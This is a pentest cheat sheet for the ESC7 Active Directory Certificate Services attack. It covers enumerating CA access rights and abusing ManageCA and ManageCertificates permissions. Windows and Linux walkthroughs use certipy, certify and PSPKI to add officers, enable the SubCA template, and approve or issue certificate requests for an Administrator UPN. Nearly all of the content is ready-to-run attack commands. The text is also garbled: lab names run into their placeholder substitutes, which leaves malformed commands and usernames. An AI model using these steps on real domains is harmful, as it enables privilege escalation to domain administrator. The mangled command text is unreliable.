ESC7
Vulnerable Certificate Authority Access Control
where 2 sets of permissions poses security risks:
- ManageCA (or
ManageCertificates
) - ManageCertificates (or
Certificate Manager
)
Enumerate using certsrv.msc
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.localminions.com | Get-CertificationAuthorityAcl | select -expand Access
Query CA with certutil (EditFlags
value)
Check if EDITF_ATTRIBUTESUBJECTALTNAME2
is set if the value is 1376590
.
PS /home/bobbuilder> certutil.exe -config "LAB-DC.lab.local\lab-LAB-DC-CA"minions.com\CA-minions" -getreg "policy\EditFlags"
Enumerate using PSPKI
module
PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.lab.localminions.com | Get-CertificationAuthorityAcl | select -ExpandProperty access
Windows
Attack 1 (Allow SAN by flipping EDITF_ATTRIBUTESUBJECTALTNAME2
)
Templates with ManageCA enables the principal to manipulate settings remotely using PSPKI by toggling the EDITF_ATTRIBUTESUBJECTALTNAME2
flag (just like with ESC6). This allows SAN specification in any template. The ESC6 attack got patch on May of 2022, so Attack #2 might be a better alternative if it's the case.
Note: this will not have any effect until the CA service (CertSvc) is restarted which ManageCA
users have but they can't do it remotely.
- Request Certificate Template
PS /home/bobbuilder> .\certify.exe request /ca:<caca_name> /template:ApprovalNeeded
- Import
PSPKI
module
PS /home/bobbuilder> Import-Module PSPKI
- Approve Pending Request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.localminions.com | Get-PendingRequest -RequestID 3361 | Approve-CertificateRequest
- Download Pending Request
PS /home/bobbuilder> .\certify.exe download /ca:<caca_name> /id:3361
Post Attack
Disable EDITF_ATTRIBUTESUBJECTALTNAME2
with PowerShell
PS /home/bobbuilder> $ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
PS /home/bobbuilder> $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
Attack 2 (gain ManageCertificates
right using ManageCA
)
For this attack we only need ManageCA
permission. We will need Manage Certificates
permission and SubCA
Certificate template enabled but they both can be enabled from ManageCA
- Grant
Manage Certificates
access (Optional, if we don't already)
certipyPS /home/bobbuilder> .\certipy.exe ca -ca 'corp-DC-CA'<ca_name>' -add-officer johnuser1 -username john@corp.localuser1@minions.com -password Passw0rdpassword1
- Enable
SubCA
Certificate template (Optional, The SubCA template is enabled by default)
certipyPS /home/bobbuilder> .\certipy.exe ca -username john@corp.localuser1@minions.com -password Passw0rd!password1 -target-ip ca.corp.local<ip> -ca 'corp-CA'<ca_name>' -enable-template 'SubCA'
- Request certificate based on the
SubCA
template
certipyPS /home/bobbuilder> .\certipy.exe req -username john@corp.localuser1@minions.com -password Passw0rdpassword1 -ca corp-DC-CA<ca_name> -target ca.corp.local<ip> -template SubCA -upn administrator@corp.localadministrator@minions.com
- Issue the failed certificate
certipyPS /home/bobbuilder> .\certipy.exe ca -ca 'corp-DC-CA'<ca_name>' -issue-request 7851 -username john@corp.localuser1@minions.com -password Passw0rdpassword1
- Retrieve the issued certificate
certipyPS /home/bobbuilder> .\certipy.exe req -username john@corp.localuser1@minions.com -password Passw0rdpassword1 -ca corp-DC-CA<ca_name> -target ca.corp.local<ip> -retrieve 7851
Linux
Attack 1 (ManageCA
rights)
- Add Manage Certificates Access rights to BlWasp
bob$ certipy ca -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -add-officer BlWaspuser1
- Requesting a certificate with SAN (
Enrollee Supplies Subject : True
)
bob$ certipy req -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -template SubCA -upn Administrator
- Issue the certificate
bob$ certipy ca -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -issue-request 311
- Retrieve the certificate with the ID to authenticate using it
bob$ certipy req -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -retrieve 311
Attack 2 (ManageCertificates
rights)
- Request a certificate with the manager's approval
bob$ certipy req -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -template ESC7_1<template> -upn Administrator
- Approve pending request
bob$ certipy ca -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -issue-request 591
- Retrieve approved request
bob$ certipy req -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -retrieve 591